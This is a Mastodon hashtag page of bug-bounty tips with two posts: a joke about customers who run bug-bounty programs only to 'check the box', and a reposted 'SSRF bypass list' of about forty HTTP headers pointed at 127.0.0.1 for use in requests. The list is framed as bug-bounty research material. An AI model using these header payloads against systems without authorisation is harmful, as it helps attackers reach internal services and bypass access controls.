digitalcourage.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
Diese Instanz wird betrieben von Digitalcourage e.V. für die Allgemeinheit. Damit wir das nachhaltig tun können, erheben wir einen jährlichen Vorausbeitrag von 1€/Monat per SEPA-Lastschrifteinzug.

Server stats:

861
active users

#bugbountytips

0 posts0 participants0 posts today

The Seven Stages of Bug Bounty grief 😩

1.) Bug Bounty customer writes up rules and launches a program 😊

2.) Bug bounty platform invites hackers 😄

3.) Hacker provides a handful of findings 😏

4.) Customer: “No not like that!” 😠

5.) Hacker adds a few dozen findings that highlight a similar problem 😈

6.) Customer: “Now listen here you little shi-“ 🤬

7.) Hacker moves onto other programs - and possibly other platforms ⬅️ I am here

This is where Bug Bounty Platform reputation amongst the hacker community (which is - effectively - the "product") really matters. When customers sign-up to engage with security researchers through a platform so they can "check the box" that their application has been tested, and then abuse the trust that the hacker community has placed in the platform, everyone loses.

I know that Casey Ellis and co. at Bugcrowd as well as Jobert Abma and co. at HackerOne work hard to make sure that their customers are ready for what the hacker community will inevitably throw at them - but there are definitely times where a customer clearly signals that they never wanted the findings. They wanted to check the box.

And at the end of the day, if the hacker community gets mistreated by a customer, word will absolutely get around - and those hackers will vote with their feet.

✨ SSRF bypass list:

-------
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1

-----

twitter.com/0dayCTF/status/155

Credit: @0dayCTF

TwitterRyan M. Montgomery on Twitter“Best SSRF Bypass List (2022) - Copy ALL headers and paste in your request. - List: https://t.co/deOSwhXTGp - - #cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips”